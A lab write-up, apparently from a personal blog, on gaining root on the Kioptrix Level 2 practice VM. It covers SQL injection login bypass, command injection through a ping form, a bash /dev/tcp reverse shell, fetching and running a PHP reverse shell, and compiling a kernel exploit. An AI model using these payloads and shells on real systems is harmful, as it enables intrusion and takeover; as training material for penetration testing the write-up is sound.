The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.

Welcome Back

It’s time for Level 2. These write-ups are for those who’re preparing for the OSCP exam, and to improve my documentation skills along the way. Follow along.

Get the Machine's IP

Running netdiscover -r 192.168.100.0:

Currently scanning: 192.168.100.0/24   |   Screen View: Unique Hosts

 6 Captured ARP Req/Rep packets, from 5 hosts.   Total size: 360
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.100.25  00:0c:29:99:7b:35      1      60  VMware, Inc.
 --snip--

Service Enumeration

Ports/services enumeration with Nmap. According to Kioptrix Level 2 description, the following vulnerabilities are expected:

  • OS Command Injection
  • Privilege Escalation
  • SQL Injection

I’ll use nmap -sV 192.168.100.25

Nmap options:

  • -sV: Probe open ports to determine service/version info
root@kali:~# nmap -sV 192.168.100.25
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-27 19:15 +04
Nmap scan report for 192.168.100.25
Host is up (0.0012s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
111/tcp  open  rpcbind    2 (RPC #100000)
443/tcp  open  ssl/https?
631/tcp  open  ipp        CUPS 1.1
3306/tcp open  mysql      MySQL (unauthorized)
MAC Address: 00:0C:29:99:7B:35 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.82 seconds

Web Server Enumeration

On port 80, a Remote System Administration Login page is being presented:

Remote System Administration Login
Username    ____________________
Password    ____________________
Login

|||Output from Lynx: a text based browser|||

There’s no rabbit hole in the Kioptrix series so far, but i assume SQL Injection will make an entry here. First let’s run Nikto and Gobuster:

  • nikto:
root@kali:~/Kioptrix2# nikto -url http://192.168.100.25
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.100.25
+ Target Hostname:    192.168.100.25
+ Target Port:        80
+ Start Time:         2019-09-29 20:48:23 (GMT4)
---------------------------------------------------------------------------
+ Server: Apache/2.0.52 (CentOS)
+ Retrieved x-powered-by header: PHP/4.3.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.0.52 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 357810, size: 4872, mtime: Sat Mar 29 22:41:04 1980
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8725 requests: 1 error(s) and 17 item(s) reported on remote host
+ End Time:           2019-09-29 21:10:20 (GMT4) (1317 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
  • gobuster:
root@kali:~/Kioptrix2# gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.100.25
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.100.25
[+] Threads:        10
[+] Wordlist:       /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2019/09/29 20:48:48 Starting gobuster
===============================================================
/usage (Status: 403)
===============================================================
2019/09/29 20:52:34 Finished
===============================================================

There’s nothing interesting. I tried some common credentials like admin/admin, admin/password, root/admin, and no errors popped up.

SQL Injection

Let’s try a classic SQLi from Owasp Testing Guide:

  • username = 1' or ‘1’ = ‘1
  • password = 1’ or ‘1’ = ‘1
Remote System Administration Login
Username    1' or '1' = '1
Password    **************
Login

It worked. I got access to a page where i can use the ping utility:

Welcome to the Basic Administrative Web Console
Ping a Machine on the Network: ______________________________ submit

Access to System Commands

Let’s redirect the output to dev/null and execute whoami:

localhost > /dev/null ; whoami
apache

Great. Php is executing system commands. Let’s see what SUID executables are on the system:

localhost > /dev/null ; find / -perm -u=s -type f 2>/dev/null
/sbin/unix_chkpwd
/sbin/pam_timestamp_check
/sbin/pwdb_chkpwd
/usr/sbin/ccreds_validate
/usr/sbin/userhelper
/usr/sbin/userisdnctl
/usr/sbin/suexec
/usr/sbin/usernetctl
/usr/libexec/openssh/ssh-keysign
/usr/libexec/pt_chown
/usr/kerberos/bin/ksu
/usr/lib/squid/pam_auth
/usr/lib/squid/ncsa_auth
/usr/bin/chsh
/usr/bin/rcp
/usr/bin/sudo
/usr/bin/chage
/usr/bin/crontab
/usr/bin/rlogin
/usr/bin/rsh
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/lppasswd
/usr/bin/sg
/usr/bin/passwd
/bin/mount
/bin/traceroute6
/bin/traceroute
/bin/umount
/bin/ping6
/bin/ping
/bin/su

Interesting! There’s a list of Unix binaries that can be exploited by an attacker to bypass local security restrictions on gtfobins. If i can get around this, a kernel exploit won’t be necessary. Let’s deploy a reverse shell( i found two ways to do this):

Reverse Shells

  • 1: localhost > /dev/null ; bash -i >& /dev/tcp/192.168.100.30/1234 0>&1
root@kali:~# nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.100.30] from (UNKNOWN) [192.168.100.25] 32769
bash: no job control in this shell
bash-3.00$ whoami ; id
apache
uid=48(apache) gid=48(apache) groups=48(apache)
bash-3.00$ 
  • 2: Use the php-reversel-shell.php that is shipped with Kali:
root@kali:/usr/share/webshells/php# pwd
/usr/share/webshells/php
root@kali:/usr/share/webshells/php# ls | grep php
php-backdoor.php
php-reverse-shell.php
qsd-php-backdoor.php
simple-backdoor.php
root@kali:/usr/share/webshells/php# 

Let’s see what directories are owned by apache:

localhost > /dev/null ; find / -user apache | grep -v proc
/var/cache/mod_proxy
/var/cache/mod_ssl
/var/lib/dav

Nice. /var/lib/dav is great location to upload the php-reverse-shell. Make a copy of the php shell in /tmp and edit the file to input your machine’s IP and Port.

Yeah i know the first bash-reverse-shell was a lot easier, but as pentester, if there’s 10 ways to do something, DO IT. Read every report submitted on vulnhubs, etc and try to do it.

Ok. Let’s deploy a web server on top of /tmp/, by running:
python3 -m http.server --bind 192.168.100.30 9191

root@kali:/tmp# python3 -m http.server --bind 192.168.100.30 9191
Serving HTTP on 192.168.100.30 port 9191 (http://192.168.100.30:9191/) ...

Let’s jump to the ping utility, and try to download it in /var/lib/dav:

localhost > /dev/null ; cd /var/lib/dav ; wget http://192.168.100.30:9191/php-reverse-shell.php

Let’s verify it:

localhost > /dev/null ; ls /var/lib/dav/
php-reverse-shell.php

Make sure your machine is listening on the port you entered earlier. Enable the execute permission on the php-reverse-shell and run it:

root@kali:/tmp# nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.100.30] from (UNKNOWN) [192.168.100.25] 32771
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
 23:33:58 up  1:09,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-3.00$ 

Awesome :D

IppSec technique to obtain an interactive Shell

Execute: python -c 'import pty;pty.spawn("/bin/bash");'

sh-3.00$ python -c 'import pty;pty.spawn("/bin/bash");'        
bash-3.00$

Press CTRL+Z to background netcat/nc. Enter stty raw -echo. Then run fg to bring the shell back.

Now you can press CTRL+L to clear the screen, Tab Completion, and so on.

Privilege Escalation

Gtfo’s have nothing useful. Let’s see what kernel/os version is running:

bash-3.00$ cat /proc/version 
Linux version 2.6.9-55.EL (mockbuild@builder6.centos.org) (gcc version 3.4.6 20060404 (Red Hat 3.4.6-8))#1 Wed May 2 13:52:16 EDT 2007
bash-3.00$ cat /etc/redhat-release
CentOS release 4.5 (Final)
bash-3.00$ 

Exploit-db:

root@kali:/tmp# searchsploit centos 4.5
------------------------------------------------------------------------------------------ ----------------------------------------
 Exploit Title                                                                            |  Path
                                                                                          | (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------ ----------------------------------------
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_ap | exploits/linux_x86/local/9542.c
Linux Kernel 3.14.5 (CentOS 7 / RHEL) - 'libfutex' Local Privilege Escalation             | exploits/linux/local/35370.c
------------------------------------------------------------------------------------------ ----------------------------------------
Shellcodes: No Result

That’s the first one. Switch to the reverse shell, download it in /tmp (anyone can write in /tmp), compile it and execute:

bash-3.00$ gcc 9542.c -o shell
9542.c:109:28: warning: no newline at end of file
bash-3.00$ ./shell 
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
sh-3.00# 

You’re root.

Try different ways to do this. For example, it wget was not available, you’ll have to deploy your own web server like i did above, and then use curl to download the file.

The exploit will only work/compile on 32-bit machines. To compile it on 64-bit, install the following:

apt-get install gcc-multilib -y ; apt-get upgrade clang -y

Then:

gcc -m32 -o exploit 9542.c

Thank you for reading. Stay tuned for Level 3.


"The name of the Lord is a strong tower;the righteous run into it and are safe." Proverbs 18:10